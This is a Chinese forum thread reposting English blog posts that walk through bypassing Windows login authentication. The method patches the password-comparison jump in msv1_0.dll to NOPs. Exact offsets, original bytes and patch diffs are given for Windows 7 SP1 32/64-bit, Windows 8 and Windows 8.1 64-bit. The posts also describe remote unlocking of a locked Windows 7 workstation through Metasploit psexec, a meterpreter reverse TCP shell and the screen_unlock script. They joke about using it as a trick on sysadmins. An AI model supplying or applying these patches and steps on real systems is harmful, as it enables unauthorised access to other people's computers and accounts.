利用msv1_0.dll绕过系统登录验证原理（英文）

nkc3g4

原文标题：
Unlocking Windows 7 SP1 locked screen remotelyThose concerned know about msv1_0.dll  function MsvpPasswordValidate in Windows operating systems. A useful script for unlocking locked workstation in Metasploit Meterpreter is called screen_unlock.rb. It works well but the signatures and offsets are a little outdated as they are missing Win7 SP1 and latest XP SP3 msv1_0.dll security update.
As Microsoft ships newer versions of msv1_0.dll we need to manually search using a debugger for offsets and signatures as the old ones wont work anymore.  In this article I will explain how to do it using the freeware IDA  disassembler v. 5.0 and the msv1_0.dll from Win7 SP1 32bit.
For 64Bit Windows 7 the approach is the same, I dont have access to it at this moment.
Okay so here we are stuck with Win7 SP1 with all updates…. and screen_unlock script bails out that : found signature does not match.
Well time to get our hands dirty and do some disassembly, its not as hard as it looks.
Load IDA and create new “PE Dynamic Library” Dissasembly Database, load c:\windows\system32\msv1_0.dll
Once loaded we need to search for MsvpPasswordValidate function signature :


Take note on the Start address its: 6D48E26D , from this we know that the MsvpPasswordValidate signature offset is 0xe26d
Next we need to verify the HEX signature of this function, so switch to hex view in IDA and see :



The signature is 8BFF558BEC81EC88000000A1 which pretty stays the same since Vista SP0.
Okay now the hard part, we need to find a function that checks the user input password and compares the hashes in memory. This function is called RtlCompareMemory and we need to look for this pattern and stay within the 6D48Exxx offset range. There are tons of obfuscations in there so look towards the end of the map.




This is the pattern we are looking for ! What happens here is this compares the two password hashes and if they don’t match it jumps to incorrect password return value. We need to short-circuit the whole process and replace “jnz   loc_6D49776B” with our bypass patch which will take us directly to the end of the function with NOP so that we can use any password.
So here we have this in HEX


So take a note of the value 0F8550940000 this is our original_code  and its offset at 6D48E315  is  0xe315
the NOP in hex would be   909090909090 so this would be our patch code
...省略一点...
So if you need to unlock a locked Win7 computer on a Windows Domain,  Metasploit and /exploit/windows/psexec module  are your friends.  Just select the meterpreter reverse tcp and once you have a shell on the remote system, run the script. Remember that once the memory is patched and the the user who locked the screen is part of a domain you need to immediately revert the patching  by issuing the ” screen_unlock -r” command after you log into Win7 with ANY password, or the domain account will be locked after a while. Also any local account can be bypassed with ANY password…. hint hint …..
Its could be used as a nice Magic trick on some sysadmins … think of a password my friend and set your account to this password … now abracadabra … I know it !  Oh well..whatever.


转载自：http://astr0baby.wordpress.com/2 ... ed-screen-remotely/

nkc3g4

原作者还写了关于Win8 64位、Win8.164位的文章，一并转载上来

转载自：http://astr0baby.wordpress.com/2 ... in-windows-8-64bit/

I’ve always wondered what this logo reminds me of…wait it was an old Greek state flag  from 1822 – 1969 The colors were used in the Greek revolution when they fought the Ottoman Empire.

OK, now we move next to the latest OS from Microsoft -> Windows 8 Pro 64bit. There seems to be a big void in the description of various functions inside the library, so it makes debugging harder, but not impossible. I had to go manually trough all the functions to check for our RtlCompareMemory friends and find the correct section which needs to be patched. There seems to be incomplete info on the Microsoft Symbol Server for the PDB of msv1_0.dll (or at least this is how I understand this)

So after a careful analysis I came up with the following anonymous function that should correspond to MsvpPasswordValidate :

It is :   sub_18001014C

Next we look for the RtlCompareMemory function and patch our jnz loc with NOP, in this case it is starting with loc_1800101F0 and jnz_loc 18001B4B7

So we open it in HEX view and do our modifications of the jnz_loc 18001B4B7

1. msv1_0.dll
   
2. 0000F609: 0F 90
   
3. 0000F60A: 85 90
   
4. 0000F60B: A8 90
   
5. 0000F60C: B2 90
   
6. 0000F60D: 00 90
   
7. 0000F60E: 00 90

复制代码

Here is the patch for the file. Use ida_patcher.exe to patch the original msv1_0.dll and test in your lab.

在此感谢astr0baby 大神！！

nkc3g4

还有一篇Windows8.1 64位的原文标题：Windows 8.1 64bit msv1_0.dll patch update

Recently Microsoft has issued a Consumer Preview  for public download of Windows 8.1. I have gone through the msv1_0.dll file to look for the msvppasswordvalidate function in the dll and patch the corresponding section with a bypass code. There are slight changes from previous release of course which is described below. Still searching for a reliable way to do this via Metasploit meterpreter screen_unlock.rb script for 64bit platform (no problem for 32bit) But like in the previous example, a local patch of msv1_0.dll is required for this demo.




Mysterious function that we are interested in is SUB_18000588C – msvppasswordvalidate
Again a quick view in HEX the equivalent of  JNZ  LOC_1800432C0  is
0F 85 EB 26 02 00




Patching this value by 90 90 90 90 90 90 we successfully bypass any local authentication via msv1_0.dll in Windows 8.1 (any password you type will do etc…)
Here is the patch diff:

1. msv1_0.dll
   
2. 0001FFCF: 0F 90
   
3. 0001FFD0: 85 90
   
4. 0001FFD1: EB 90
   
5. 0001FFD2: 26 90
   
6. 0001FFD3: 02 90
   
7. 0001FFD4: 00 90

复制代码

Patch the original dll using ida_patcher.exe and replace the msv1_0.dll in C:\Windows\System32\msv1_0.dll with the patched dll. I have used a Linux live CD with ntfs-3g drivers to do this for the demo.

nkc3g4

再补一个Windows 7 64位的
Fun with msv1_0.dll in Windows 7 SP1 64bit

Recently I was able to look at the 64bit version of Windows 7 and check the MsvpPasswordValidate within the ms1_0.dll to see if it is possible to NOP the TRUE/FALSE RtlCompareMemory function when we compare hashes in memory.
It is actually much simpler then the Win7 SP1 32bit version of the library, with so much less objects in IDA-view it was very easy to find the function and replace it with NOP.
So in my demonstration Im using IDA-pro (for 64bit DLLs) and a patch utility called ida_patcher.c (download it from IDA and compile using Visual Studio Express 2010) to diff the results against the msv1_0.dll



So we search for the function MsvpPasswordValidate within the msv1_0.dll and check the following section in the IDA-view




Looks simple right ? So next we need to highlight the jnz loc_7FF735183A4
and switch to hex view so that we can see the part which we can patch like so:



Next we patch the highlited hex strings with NOP so instead of  0F 85 7C 80 00 00 we will have 90 90 90 90 90 90




Then we produce a DIFF file with our changes which we can then patch using the ida_patcher.exe





So the final command would be > ida_patcher.exe -i msv1_0.dll -p msv1_0.dll.patch
The resulting msv1_0.dll  (which we have copied from the C:\windows\system32 to another location right ?) can be used to authenticate with any password against Win7 64 SP1. For the tests sake I’ve just replaced the original msv1_0.dll with the patched one and i can login with any password imaginable. Nothing groundbreaking, but still could be used as a nice magic trick to amuse kids in your local IT class.

转载自：https://astr0baby.wordpress.com/ ... indows-7-sp1-64bit/

因为是给有一定能力的人看，所以我就不翻译了。